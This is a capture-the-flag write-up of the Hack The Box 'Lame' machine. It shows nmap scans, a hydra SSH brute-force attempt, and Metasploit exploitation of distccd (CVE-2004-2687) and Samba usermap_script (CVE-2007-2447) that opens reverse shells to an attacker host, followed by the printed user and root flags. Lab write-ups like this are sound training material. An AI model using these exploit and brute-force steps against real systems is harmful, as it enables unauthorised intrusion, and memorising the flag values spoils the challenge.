Lame

Starting information

Machine IP : 10.10.10.3 System : Linux

Network enumeration

I start by modifying my /etc/hosts file to avoid writing the IP everytime :

10.10.10.3 lame

Then I look for open ports :

nmap lame -Pn 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:18 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.034s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Now that I know I have some interesting ports opened, I run nmap with its scripts:

 nmap lame -A -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:18 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.034s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.81 seconds

The first thing I see is that anonymous login is authorised on the FTP server. Unfortunately no folders are visible and trying to access them directly returns an error. The anonymous login seems to be a dead end.

Not sure where to go next I try to bruteforce the password for the ssh user admin but with no avail:

hydra -l admin -P ~/Resources/SecurityTools/IntruderPayloads/FuzzLists/passwords_quick.txt lame ssh -t 4

I end up doing a full port scan of the target in case I missed something important and start an OpenVAS scan in parallel:

nmap -p- lame -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:27 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.033s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

DistCCD

distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients. distcc can run over either TCP or a connection command such as ssh.

My OpenVAS scan is not yet finished that I can see two high vulnerabilities, one of which is a remote code execution targeting distccd: CVE-2004-2687. An exploit for this CVE is available in Metasploit, let’s fire it up.

First I make sure postgresql is started.

service postgresql start

Then I start Mestasploit.

msfconsole

Here is the exploit available for distcc:

msf5 > search distccd

Matching Modules
================

   #  Name                           Disclosure Date  Rank       Check  Description
   -  ----                           ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

I select the exploit with use:

msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > 

For the options I just need to specify the host and the port:

msf5 exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   3632             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

I set the RHOSTS option with the set command and check that the option is correctly set:

msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.10.10.3       yes       The target address range or CIDR identifier
   RPORT   3632             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Great! Everything seems to be properly configured, now I can try the exploit:

msf5 exploit(unix/misc/distcc_exec) > run

[*] Started reverse TCP double handler on 10.10.14.7:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4WOw9Ir4tJSBhdJM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4WOw9Ir4tJSBhdJM\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.7:4444 -> 10.10.10.3:53376) at 2019-09-22 18:15:32 +0200

ls
5140.jsvc_up

Looks like it worked!

User flag

Now that I have access to a shell on the machine, finding the user flag shouldn’t be too much of hassle.

I look a the home directories and search for the file user.txt

cd /home

ls
ftp
makis
service
user

ls makis
user.txt

cat makis/user.txt
69454a937d94f5f0225ea00acd2e84c5

Root flag

I retrieving the user flag was a piece of cake, I suspect that the root flag might be a bit more difficult.

ls /root
Desktop
reset_logs.sh
root.txt
vnc.log


cat /root/root.txt
cat: /root/root.txt: Permission denied

I don’t have the permissions to access root.txt. I will have to find a privilege escalation.

From my OpenVAS scan I can see that Samba MS-RPC is vulnerable to a Remote Shell Command Execution Vulnerability: CVE-2007-2447.

The exploit is available in Mestasploit:

msf5 > search 2007-2447

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Now I just have to configure it and run it:

msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.7:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo gnLmqtNCReENz5i3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "gnLmqtNCReENz5i3\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.7:4444 -> 10.10.10.3:39128) at 2019-09-22 18:35:52 +0200


id
uid=0(root) gid=0(root)

It looks like I am root. Let’s see if I can get the root flag:

ls /root
Desktop
reset_logs.sh
root.txt
vnc.log

cat /root/root.txt
92caac3be140ef409e45721348a4e9df